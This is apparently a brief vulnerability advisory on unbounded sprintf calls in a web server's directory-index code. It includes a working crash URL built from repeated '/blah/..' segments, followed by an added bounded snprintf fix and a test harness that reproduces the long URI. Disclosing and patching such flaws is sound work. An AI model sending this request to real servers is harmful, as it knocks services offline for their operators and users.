In server.c, line 187:
    sprintf(z,"Index of %s" CRLF,r->uri);
and lines 204 and 205:
    sprintf(z,"<HTML><HEAD><TITLE>Index of %s</TITLE></HEAD><BODY>"
    "<H1>Index of %s</H1><PRE>",r->uri,r->uri);
If a directory exists off htdocs, both of these may be exploited by going to:
http://server/blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/
where blah is the name of the directory. Obviously, shorter directory names will need more repetitions, and longer directory names will need fewer repetitions.
In this form, it is a DoS attack and crashes the httpd.
Several of the strcpy/sprintfs also look dodgy.
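
A bounded form of the two sprintf calls quoted above, as an added example that is not part of the original advisory or the server's own code. The function names, the helper build_long_uri and the 256-byte size for z are assumptions; the advisory does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define CRLF "\r\n"
#define INDEX_BUF 256 /* assumed; the advisory does not state the real size of z */

/* Reject instead of truncating: returns n, or -1 with z emptied if it did not fit. */
static int fit_or_fail(int n, char *z, size_t zlen)
{
    if (n >= 0 && (size_t)n < zlen) return n;
    if (zlen > 0) z[0] = '\0';
    return -1;
}

/* Bounded form of: sprintf(z,"Index of %s" CRLF,r->uri); */
int format_index_line(char *z, size_t zlen, const char *uri)
{
    return fit_or_fail(snprintf(z, zlen, "Index of %s" CRLF, uri), z, zlen);
}

/* Bounded form of the two-%s title/heading sprintf. */
int format_index_html(char *z, size_t zlen, const char *uri)
{
    return fit_or_fail(snprintf(z, zlen,
        "<HTML><HEAD><TITLE>Index of %s</TITLE></HEAD><BODY>"
        "<H1>Index of %s</H1><PRE>", uri, uri), z, zlen);
}

/* Constructed test input: "/dir/.." repeated, the URI shape from the advisory. */
size_t build_long_uri(char *out, size_t outlen, const char *dir, int reps)
{
    size_t used = 0;
    if (outlen == 0) return 0;
    out[0] = '\0';
    for (int i = 0; i < reps; i++) {
        int n = snprintf(out + used, outlen - used, "/%s/..", dir);
        if (n < 0 || (size_t)n >= outlen - used) { out[used] = '\0'; break; }
        used += (size_t)n;
    }
    return used;
}

int main(void)
{
    char z[INDEX_BUF], uri[1024];
    build_long_uri(uri, sizeof uri, "blah", 60);
    printf("short: %d\n", format_index_line(z, sizeof z, "/blah/"));
    printf("long:  %d\n", format_index_html(z, sizeof z, uri));
    return 0;
}
```

A caller that gets -1 should answer with an error status rather than send a truncated index page.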